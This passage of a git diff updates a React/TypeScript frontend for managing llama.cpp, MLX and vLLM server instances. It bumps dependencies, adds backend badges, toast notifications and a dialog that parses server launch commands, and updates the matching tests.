@@ -2109,6 +2110,60 @@
"node": ">=14.0.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/core": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/wasi-threads": "1.0.2",
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/runtime": {
"version": "1.4.3",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/wasi-threads": {
"version": "1.0.2",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@napi-rs/wasm-runtime": {
"version": "0.2.11",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/core": "^1.4.3",
"@emnapi/runtime": "^1.4.3",
"@tybys/wasm-util": "^0.9.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@tybys/wasm-util": {
"version": "0.9.0",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/tslib": {
"version": "2.8.0",
"inBundle": true,
"license": "0BSD",
"optional": true
},
"node_modules/@tailwindcss/oxide-win32-arm64-msvc": {
"version": "4.1.11",
"resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.1.11.tgz",
@@ -4190,10 +4245,13 @@
}
},
"node_modules/fdir": {
"version": "6.4.6",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.4.6.tgz",
"integrity": "sha512-hiFoqpyZcfNm1yc4u8oWCf9A2c4D3QjCrks3zmoVKVxpQRzmPNar1hUJcBG2RQHvEVGDN+Jm81ZheVLAQMK6+w==",
"version": "6.5.0",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
"integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
"license": "MIT",
"engines": {
"node": ">=12.0.0"
},
"peerDependencies": {
"picomatch": "^3 || ^4"
},
@@ -6693,6 +6751,16 @@
"node": ">=18"
}
},
"node_modules/sonner": {
"version": "2.0.7",
"resolved": "https://registry.npmjs.org/sonner/-/sonner-2.0.7.tgz",
"integrity": "sha512-W6ZN4p58k8aDKA4XPcx2hpIQXBRAgyiWVkYhT7CvK6D3iAu7xjvVyhQHg2/iaKJZ1XVJ4r7XuwGL+WGEK37i9w==",
"license": "MIT",
"peerDependencies": {
"react": "^18.0.0 || ^19.0.0 || ^19.0.0-rc",
"react-dom": "^18.0.0 || ^19.0.0 || ^19.0.0-rc"
}
},
"node_modules/source-map-js": {
"version": "1.2.1",
"resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
@@ -6973,13 +7041,13 @@
"license": "MIT"
},
"node_modules/tinyglobby": {
"version": "0.2.14",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.14.tgz",
"integrity": "sha512-tX5e7OM1HnYr2+a2C/4V0htOcSQcoSTH9KgJnVvNm5zm/cyEWKJ7j7YutsH9CxMdtOkkLFy2AHrMci9IM8IPZQ==",
"version": "0.2.15",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.15.tgz",
"integrity": "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==",
"license": "MIT",
"dependencies": {
"fdir": "^6.4.4",
"picomatch": "^4.0.2"
"fdir": "^6.5.0",
"picomatch": "^4.0.3"
},
"engines": {
"node": ">=12.0.0"
@@ -7356,17 +7424,17 @@
}
},
"node_modules/vite": {
"version": "7.0.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.0.5.tgz",
"integrity": "sha512-1mncVwJxy2C9ThLwz0+2GKZyEXuC3MyWtAAlNftlZZXZDP3AJt5FmwcMit/IGGaNZ8ZOB2BNO/HFUB+CpN0NQw==",
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",
"fdir": "^6.4.6",
"picomatch": "^4.0.2",
"fdir": "^6.5.0",
"picomatch": "^4.0.3",
"postcss": "^8.5.6",
"rollup": "^4.40.0",
"tinyglobby": "^0.2.14"
"rollup": "^4.43.0",
"tinyglobby": "^0.2.15"
},
"bin": {
"vite": "bin/vite.js"

View File

@@ -28,6 +28,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -51,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
}

View File

@@ -8,6 +8,7 @@ import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
import { Toaster } from "sonner";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -30,9 +31,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) {
updateInstance(editingInstance.name, options);
void updateInstance(editingInstance.name, options);
} else {
createInstance(name, options);
void createInstance(name, options);
}
};
@@ -85,6 +86,8 @@ function App() {
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
<Toaster />
</div>
</ThemeProvider>
);

View File

@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
]
beforeEach(() => {
@@ -81,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const newInstance: Instance = {
name: 'new-test-instance',
running: false,
options: { model: 'new-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
}
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -105,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -118,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const updatedInstance: Instance = {
name: 'test-instance-1',
running: false,
options: { model: 'updated-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
}
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -138,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
})
})
})
@@ -157,7 +160,7 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getAllByTitle('Start instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Stop instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Edit instance').length).toBe(2)
expect(screen.getAllByTitle('Delete instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('More actions').length).toBe(2)
})
it('delete confirmation calls correct API', async () => {
@@ -171,8 +174,17 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getByText('test-instance-1')).toBeInTheDocument()
})
const deleteButtons = screen.getAllByTitle('Delete instance')
await user.click(deleteButtons[0])
// First click the "More actions" button to reveal the delete button
const moreActionsButtons = screen.getAllByTitle('More actions')
await user.click(moreActionsButtons[0])
// Wait for the delete button to appear and click it
await waitFor(() => {
expect(screen.getByTitle('Delete instance')).toBeInTheDocument()
})
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
// Verify confirmation and API call
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance-1"?')

View File

@@ -0,0 +1,65 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import { BackendType, type BackendTypeValue } from "@/types/instance";
import { Server, Package } from "lucide-react";
interface BackendBadgeProps {
backend?: BackendTypeValue;
docker?: boolean;
}
const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
if (!backend) {
return null;
}
const getText = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "llama.cpp";
case BackendType.MLX_LM:
return "MLX";
case BackendType.VLLM:
return "vLLM";
default:
return backend;
}
};
const getColorClasses = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "bg-blue-100 text-blue-800 border-blue-200 dark:bg-blue-900 dark:text-blue-200 dark:border-blue-800";
case BackendType.MLX_LM:
return "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800";
case BackendType.VLLM:
return "bg-purple-100 text-purple-800 border-purple-200 dark:bg-purple-900 dark:text-purple-200 dark:border-purple-800";
default:
return "bg-gray-100 text-gray-800 border-gray-200 dark:bg-gray-900 dark:text-gray-200 dark:border-gray-800";
}
};
return (
<div className="flex items-center gap-1">
<Badge
variant="outline"
className={`flex items-center gap-1.5 ${getColorClasses()}`}
>
<Server className="h-3 w-3" />
<span className="text-xs">{getText()}</span>
</Badge>
{docker && (
<Badge
variant="outline"
className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
title="Docker enabled"
>
<Package className="h-3 w-3" />
<span className="text-[10px] uppercase tracking-wide">Docker</span>
</Badge>
)}
</div>
);
};
export default BackendBadge;

View File

@@ -2,24 +2,23 @@ import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
interface BackendFormFieldProps {
fieldKey: string
value: string | number | boolean | string[] | undefined
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getFieldType(fieldKey)
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey, newValue)
onChange(fieldKey as string, newValue)
}
const renderField = () => {
@@ -46,7 +45,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -73,7 +71,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -100,7 +97,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -120,4 +116,4 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
return <div className="space-y-2">{renderField()}</div>
}
export default ZodFormField
export default BackendFormField

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />;
case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive";
case "unknown":
return "secondary";
case "failed":
return "destructive";
}
};
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error";
case "unknown":
return "Unknown";
case "failed":
return "Failed";
}
};

View File

@@ -2,9 +2,10 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +25,8 @@ function InstanceCard({
editInstance,
}: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running);
const [showAllActions, setShowAllActions] = useState(false);
const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => {
startInstance(instance.name);
@@ -50,38 +52,48 @@ function InstanceCard({
setIsLogsOpen(true);
};
const running = instance.status === "running";
return (
<>
<Card>
<CardHeader className="pb-3">
<div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />}
<Card className="hover:shadow-md transition-shadow">
<CardHeader className="pb-4">
{/* Header with instance name and status badges */}
<div className="space-y-3">
<CardTitle className="text-lg font-semibold leading-tight break-words">
{instance.name}
</CardTitle>
{/* Badges row */}
<div className="flex items-center gap-2 flex-wrap">
<BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
{running && <HealthBadge health={health} />}
</div>
</div>
</CardHeader>
<CardContent>
<div className="flex gap-1">
<CardContent className="pt-0">
{/* Primary actions - always visible */}
<div className="flex items-center gap-2 mb-3">
<Button
size="sm"
variant="outline"
onClick={handleStart}
disabled={instance.running}
title="Start instance"
data-testid="start-instance-button"
variant={running ? "outline" : "default"}
onClick={running ? handleStop : handleStart}
className="flex-1"
title={running ? "Stop instance" : "Start instance"}
data-testid={running ? "stop-instance-button" : "start-instance-button"}
>
<Play className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="outline"
onClick={handleStop}
disabled={!instance.running}
title="Stop instance"
data-testid="stop-instance-button"
>
<Square className="h-4 w-4" />
{running ? (
<>
<Square className="h-4 w-4 mr-1" />
Stop
</>
) : (
<>
<Play className="h-4 w-4 mr-1" />
Start
</>
)}
</Button>
<Button
@@ -97,24 +109,40 @@ function InstanceCard({
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
onClick={() => setShowAllActions(!showAllActions)}
title="More actions"
>
<FileText className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={instance.running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
<MoreHorizontal className="h-4 w-4" />
</Button>
</div>
{/* Secondary actions - collapsible */}
{showAllActions && (
<div className="flex items-center gap-2 pt-2 border-t border-border">
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
className="flex-1"
>
<FileText className="h-4 w-4 mr-1" />
Logs
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
</Button>
</div>
)}
</CardContent>
</Card>
@@ -122,7 +150,7 @@ function InstanceCard({
open={isLogsOpen}
onOpenChange={setIsLogsOpen}
instanceName={instance.name}
isRunning={instance.running}
isRunning={running}
/>
</>
);

View File

@@ -1,7 +1,5 @@
import React, { useState, useEffect } from "react";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
@@ -10,10 +8,10 @@ import {
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
interface InstanceDialogProps {
open: boolean;
@@ -29,16 +27,12 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance,
}) => {
const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [showAdvanced, setShowAdvanced] = useState(false);
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
// Get field lists dynamically from the type
const basicFields = getBasicFields();
const advancedFields = getAdvancedFields();
// Reset form when dialog opens/closes or when instance changes
useEffect(() => {
@@ -52,17 +46,39 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName("");
setFormData({
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
});
}
setShowAdvanced(false); // Always start with basic view
setNameError(""); // Reset any name errors
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
});
};
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
[key]: value,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
}));
};
@@ -90,7 +106,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) {
if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
@@ -107,12 +140,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
onOpenChange(false);
};
const toggleAdvanced = () => {
setShowAdvanced(!showAdvanced);
const handleCommandParsed = (parsedOptions: CreateInstanceOptions) => {
setFormData(prev => ({
...prev,
...parsedOptions,
}));
setShowParseDialog(false);
};
// Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
@@ -129,125 +175,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
</DialogHeader>
<div className="flex-1 overflow-y-auto">
<div className="grid gap-6 py-4">
{/* Instance Name - Special handling since it's not in CreateInstanceOptions */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => handleNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing} // Don't allow name changes when editing
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
<div className="space-y-6 py-4">
{/* Instance Settings Card */}
<InstanceSettingsCard
instanceName={instanceName}
nameError={nameError}
isEditing={isEditing}
formData={formData}
onNameChange={handleNameChange}
onChange={handleFieldChange}
/>
{/* Auto Restart Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">
Auto Restart Configuration
</h3>
{/* Backend Configuration Card */}
<BackendConfigurationCard
formData={formData}
onBackendFieldChange={handleBackendFieldChange}
onChange={handleFieldChange}
onParseCommand={() => setShowParseDialog(true)}
/>
{/* Auto Restart Toggle */}
<ZodFormField
fieldKey="auto_restart"
value={formData.auto_restart}
onChange={handleFieldChange}
/>
{/* Show restart options only when auto restart is enabled */}
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<ZodFormField
fieldKey="max_restarts"
value={formData.max_restarts}
onChange={handleFieldChange}
/>
<ZodFormField
fieldKey="restart_delay"
value={formData.restart_delay}
onChange={handleFieldChange}
/>
</div>
)}
</div>
{/* Basic Fields - Automatically generated from type (excluding auto restart options) */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Configuration</h3>
{basicFields
.filter(
(fieldKey) =>
fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay"
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */}
<div className="border-t pt-4">
<Button
variant="ghost"
onClick={toggleAdvanced}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Configuration
<span className="text-muted-foreground text-sm font-normal">
(
{
advancedFields.filter(
(f) =>
!["max_restarts", "restart_delay"].includes(f as string)
).length
}{" "}
options)
</span>
</Button>
</div>
{/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4">
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay"].includes(
fieldKey as string
)
) // Exclude restart options as they're handled above
.sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
</div>
)}
</div>
</div>
@@ -264,14 +210,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
{isEditing
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
{saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>
<ParseCommandDialog
open={showParseDialog}
onOpenChange={setShowParseDialog}
onParsed={handleCommandParsed}
backendType={formData.backend_type || BackendType.LLAMA_CPP}
/>
</Dialog>
);
};

View File

@@ -0,0 +1,151 @@
import React, { useState } from "react";
import { Button } from "@/components/ui/button";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type BackendTypeValue, type CreateInstanceOptions } from "@/types/instance";
import { backendsApi } from "@/lib/api";
import { toast } from "sonner";
interface ParseCommandDialogProps {
open: boolean;
onOpenChange: (open: boolean) => void;
onParsed: (options: CreateInstanceOptions) => void;
backendType: BackendTypeValue;
}
const ParseCommandDialog: React.FC<ParseCommandDialogProps> = ({
open,
onOpenChange,
onParsed,
backendType,
}) => {
const [command, setCommand] = useState('');
const [loading, setLoading] = useState(false);
const [error, setError] = useState<string | null>(null);
const handleParse = async () => {
if (!command.trim()) {
setError("Command cannot be empty");
return;
}
setLoading(true);
setError(null);
try {
let options: CreateInstanceOptions;
// Parse based on selected backend type
switch (backendType) {
case BackendType.LLAMA_CPP:
options = await backendsApi.llamaCpp.parseCommand(command);
break;
case BackendType.MLX_LM:
options = await backendsApi.mlx.parseCommand(command);
break;
case BackendType.VLLM:
options = await backendsApi.vllm.parseCommand(command);
break;
default:
throw new Error(`Unsupported backend type: ${backendType}`);
}
onParsed(options);
onOpenChange(false);
setCommand('');
setError(null);
toast.success('Command parsed successfully');
} catch (err) {
const errorMessage = err instanceof Error ? err.message : 'Failed to parse command';
setError(errorMessage);
toast.error('Failed to parse command', {
description: errorMessage
});
} finally {
setLoading(false);
}
};
const handleOpenChange = (open: boolean) => {
if (!open) {
setCommand('');
setError(null);
}
onOpenChange(open);
};
const backendPlaceholders: Record<BackendTypeValue, string> = {
[BackendType.LLAMA_CPP]: "llama-server --model /path/to/model.gguf --gpu-layers 32 --ctx-size 4096",
[BackendType.MLX_LM]: "mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --host 0.0.0.0 --port 8080",
[BackendType.VLLM]: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2 --gpu-memory-utilization 0.9",
};
const getPlaceholderForBackend = (backendType: BackendTypeValue): string => {
return backendPlaceholders[backendType] || "Enter your command here...";
};
return (
<Dialog open={open} onOpenChange={handleOpenChange}>
<DialogContent className="sm:max-w-[600px]">
<DialogHeader>
<DialogTitle>Parse Backend Command</DialogTitle>
<DialogDescription>
Select your backend type and paste the command to automatically populate the form fields
</DialogDescription>
</DialogHeader>
<div className="space-y-4">
<div>
<Label className="text-sm font-medium">Backend Type:
<span className="font-normal text-muted-foreground">
{backendType === BackendType.LLAMA_CPP && 'Llama Server'}
{backendType === BackendType.MLX_LM && 'MLX LM'}
{backendType === BackendType.VLLM && 'vLLM'}
</span>
</Label>
</div>
<div>
<Label htmlFor="command">Command</Label>
<textarea
id="command"
value={command}
onChange={(e) => setCommand(e.target.value)}
placeholder={getPlaceholderForBackend(backendType)}
className="w-full h-32 p-3 mt-2 border border-input rounded-md font-mono text-sm resize-vertical focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2"
/>
</div>
{error && (
<div className="text-destructive text-sm bg-destructive/10 p-3 rounded-md">
{error}
</div>
)}
</div>
<DialogFooter>
<Button variant="outline" onClick={() => handleOpenChange(false)}>
Cancel
</Button>
<Button
onClick={() => {
handleParse().catch(console.error);
}}
disabled={!command.trim() || loading}
>
{loading ? 'Parsing...' : 'Parse Command'}
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
);
};
export default ParseCommandDialog;

View File

@@ -8,16 +8,19 @@ import {
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import {
RefreshCw,
import SelectInput from '@/components/form/SelectInput'
import {
RefreshCw,
AlertCircle,
Loader2,
ChevronDown,
ChevronRight,
Monitor,
HelpCircle
HelpCircle,
Info
} from 'lucide-react'
import { serverApi } from '@/lib/api'
import { BackendType, type BackendTypeValue } from '@/types/instance'
// Helper to get version from environment
const getAppVersion = (): string => {
@@ -28,166 +31,234 @@ const getAppVersion = (): string => {
}
}
interface SystemInfoModalProps {
interface SystemInfoDialogProps {
open: boolean
onOpenChange: (open: boolean) => void
}
interface SystemInfo {
interface BackendInfo {
version: string
devices: string
help: string
}
const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
const BACKEND_OPTIONS = [
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' },
]
const SystemInfoDialog: React.FC<SystemInfoDialogProps> = ({
open,
onOpenChange
}) => {
const [systemInfo, setSystemInfo] = useState<SystemInfo | null>(null)
const [selectedBackend, setSelectedBackend] = useState<BackendTypeValue>(BackendType.LLAMA_CPP)
const [backendInfo, setBackendInfo] = useState<BackendInfo | null>(null)
const [loading, setLoading] = useState(false)
const [error, setError] = useState<string | null>(null)
const [showHelp, setShowHelp] = useState(false)
// Fetch system info
const fetchSystemInfo = async () => {
// Fetch backend info
const fetchBackendInfo = async (backend: BackendTypeValue) => {
if (backend !== BackendType.LLAMA_CPP) {
